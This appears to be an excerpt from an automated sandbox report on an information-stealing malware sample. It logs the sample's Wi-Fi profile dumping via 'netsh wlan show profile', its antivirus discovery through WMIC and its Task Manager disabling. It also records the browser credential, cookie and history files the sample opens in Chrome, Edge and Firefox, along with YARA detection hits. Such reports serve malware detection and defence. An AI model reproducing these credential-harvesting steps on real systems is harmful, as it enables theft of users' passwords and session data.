                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ro VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ru VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_HK VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B05C330 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00007FF72B05C330
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B07518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,5_2_00007FF72B07518C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B4D076 GetVersionExW,13_2_00B4D076
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Source: RuntimeBroker2.0.exe.0.dr, Program.cs.Net Code: DisableTaskManager
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Yara matchFile source: 00000010.00000003.1795412848.0000014703693000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000010.00000003.1795412848.0000014703695000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 7704, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI77042\rarreg.key, type: DROPPED
                                  Source: Yara matchFile source: 0000002A.00000002.2525882233.0000000012AFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a24170.3.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a37e08.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a10508.2.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a37e08.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a10508.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.0.RuntimeBroker2.0.exe.2227b640000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.87Bym0x4Fy.exe.3a24170.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: 87Bym0x4Fy.exe PID: 6912, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: RuntimeBroker2.0.exe PID: 7176, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe, type: DROPPED
                                  Source: Yara matchFile source: 29.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 29.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 29.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.3.s.exe.71dd711.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 42.0.ChainComServermonitor.exe.300000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 29.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000002A.00000000.1886461269.0000000000302000.00000002.00000001.01000000.00000029.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000015.00000003.1830651243.0000000007241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001D.00000003.1841385534.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001D.00000003.1839390909.0000000005600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Uninstall Information\cmd.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\cscript.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                                  Source: Yara matchFile source: 29.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 29.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 29.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.3.s.exe.71dd711.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 42.0.ChainComServermonitor.exe.300000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 29.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Uninstall Information\cmd.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\cscript.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
